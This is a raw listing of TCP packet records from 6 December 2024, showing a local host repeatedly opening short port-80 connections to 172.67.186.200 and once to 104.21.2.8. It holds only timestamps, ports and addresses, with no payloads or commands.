Dec 6, 2024 03:12:50.680463076 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:50.800049067 CET	80	49833	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:51.030112028 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.149792910 CET	80	49833	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:51.780862093 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.781301022 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.786417007 CET	80	49833	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:51.786482096 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.901133060 CET	80	49833	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:51.901160955 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:51.901210070 CET	49833	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.901257038 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.901381969 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:51.901482105 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:52.021199942 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.021217108 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.021311998 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:52.021533012 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:52.190181971 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.248955965 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:52.373994112 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:52.429884911 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.429896116 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.493670940 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:52.987447977 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.030029058 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.137917995 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.186294079 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.237140894 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.295669079 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.373668909 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.420675039 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.426315069 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.483144045 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.497339964 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.497406960 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.498100996 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.617310047 CET	80	49839	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.617357016 CET	49839	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.617796898 CET	80	49840	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.617808104 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.617851019 CET	49840	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.617880106 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.618078947 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:53.737792969 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:53.967792034 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:54.087521076 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:54.704113960 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:54.748759985 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:54.968552113 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:55.014400005 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.091109037 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.091804981 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.211070061 CET	80	49846	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:55.211476088 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:55.211679935 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.211682081 CET	49846	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.211812973 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.331478119 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:55.561392069 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:55.682188988 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:56.298325062 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:56.342508078 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.563425064 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:56.608139992 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.683424950 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.684253931 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.803486109 CET	80	49849	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:56.803579092 CET	49849	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.803932905 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:56.804126978 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.804177999 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:56.923849106 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:57.155116081 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:57.274815083 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:57.945195913 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:57.999013901 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.224590063 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.264369011 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.347433090 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.348891020 CET	49859	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.437664032 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.468095064 CET	80	49854	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.468277931 CET	49854	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.468534946 CET	80	49859	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.468589067 CET	49859	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.557528019 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.557630062 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.557847023 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.557852983 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.677516937 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.677608967 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.677701950 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.677903891 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:58.797575951 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:58.905085087 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:59.024945021 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:59.024972916 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:59.030294895 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:59.150018930 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:59.662643909 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:59.717509031 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:59.765707016 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:12:59.811250925 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:12:59.966892958 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.014420986 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.118086100 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.170622110 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.292371035 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.292498112 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.300126076 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.412559986 CET	80	49860	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.412626982 CET	49860	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.412986040 CET	80	49861	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.413043022 CET	49861	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.419939041 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.420017004 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.420259953 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.539907932 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:00.764731884 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:00.884496927 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:01.511393070 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:01.561244011 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:01.774591923 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:01.826920986 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:01.901295900 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:01.902184963 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:02.021323919 CET	80	49868	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:02.021372080 CET	49868	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:02.021837950 CET	80	49871	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:02.021902084 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:02.022102118 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:02.141751051 CET	80	49871	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:02.373888969 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:02.493628979 CET	80	49871	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:03.129143953 CET	80	49871	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:03.170618057 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:03.455615044 CET	80	49871	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:03.498862028 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:03.575643063 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:03.695427895 CET	80	49876	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:03.695507050 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:03.695694923 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:03.815346003 CET	80	49876	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:04.045917034 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:04.165617943 CET	80	49876	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:04.862462044 CET	80	49876	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:04.905071020 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.000886917 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.002013922 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.120805025 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.121021986 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.121045113 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.121323109 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.121941090 CET	80	49876	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.121994972 CET	49876	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.240757942 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.240963936 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.241039038 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.241183043 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.360863924 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.467696905 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.587423086 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.587440968 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:05.592861891 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:05.712723970 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.207357883 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.248737097 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.353595018 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.405002117 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.478293896 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.529995918 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.611742973 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.655071974 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.729743004 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.730012894 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.730631113 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.850358009 CET	80	49881	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.850414991 CET	80	49888	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.850421906 CET	49881	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.850477934 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.850641966 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.850675106 CET	80	49882	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:06.850722075 CET	49882	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:06.971045017 CET	80	49888	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:07.202044010 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:07.321789026 CET	80	49888	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:07.975847960 CET	80	49888	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:08.029983044 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.257725000 CET	80	49888	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:08.311243057 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.371279001 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.490969896 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:08.491044998 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.491251945 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.611819029 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:08.842592955 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:08.962579012 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:09.620182991 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:09.670589924 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:09.883851051 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:09.936383963 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.007493019 CET	49871	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.007564068 CET	49888	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.012212992 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.012942076 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.204797029 CET	80	49891	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:10.204808950 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:10.204848051 CET	49891	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.204905987 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.205128908 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.324754953 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:10.561419964 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:10.681231976 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.290348053 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.342461109 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.484005928 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.484409094 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.548480034 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.548641920 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.604013920 CET	80	49895	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.604063988 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.604150057 CET	49895	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.604315042 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.604377031 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.606259108 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.724010944 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.726021051 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.726092100 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.726195097 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:11.846837044 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:11.951967001 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:12.071696043 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.071717978 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.077058077 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:12.196757078 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.690315962 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.733189106 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:12.816081047 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.858166933 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:12.953449011 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:12.998755932 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.049426079 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:13.092549086 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.165653944 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.165654898 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.166352034 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.285804987 CET	80	49901	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:13.285846949 CET	80	49902	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:13.285861015 CET	49901	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.285902023 CET	49902	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.285989046 CET	80	49908	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:13.286051989 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.293025017 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.412700891 CET	80	49908	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:13.639452934 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:13.759306908 CET	80	49908	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:14.385878086 CET	80	49908	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:14.436213017 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:14.684130907 CET	80	49908	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:14.733102083 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:14.809689045 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:14.929380894 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:14.929476023 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:14.929608107 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:15.049294949 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:15.280103922 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:15.399909973 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.015139103 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.061295986 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.249187946 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.295677900 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.379792929 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.380587101 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.499875069 CET	80	49911	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.499953985 CET	49911	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.500276089 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.500344038 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.500498056 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.620141983 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:16.858180046 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:16.977988958 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:17.592822075 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:17.639333010 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:17.829015017 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:17.873789072 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:17.948621988 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:17.949309111 CET	49919	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:17.968518972 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:17.968609095 CET	49919	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:18.068690062 CET	80	49914	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.068860054 CET	49914	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.068986893 CET	80	49919	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.069040060 CET	49919	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.088305950 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.088376999 CET	80	49919	104.21.2.8	192.168.2.6
Dec 6, 2024 03:13:18.088493109 CET	49919	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:18.088495970 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.088542938 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.088619947 CET	49919	80	192.168.2.6	104.21.2.8
Dec 6, 2024 03:13:18.208338976 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.214198112 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.334019899 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.334089994 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.334285021 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.436430931 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.455375910 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.556252003 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.556265116 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:18.686362028 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:18.806603909 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.194879055 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.248687983 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.440072060 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.465154886 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.483052969 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.514425039 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.701261997 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.748692989 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.820394993 CET	49908	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.824981928 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.825130939 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.825695038 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.944997072 CET	80	49920	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.945180893 CET	49920	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.945334911 CET	80	49927	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.945384026 CET	80	49921	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:19.945405006 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.945431948 CET	49921	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:19.945638895 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:20.065273046 CET	80	49927	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:20.295690060 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:20.415487051 CET	80	49927	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:21.030962944 CET	80	49927	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:21.076813936 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:21.264940977 CET	80	49927	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:21.311323881 CET	49927	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:21.386885881 CET	49931	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:13:21.506597996 CET	80	49931	172.67.186.200	192.168.2.6
Dec 6, 2024 03:13:21.509942055 CET	49931	80	192.168.2.6	172.67.186.200
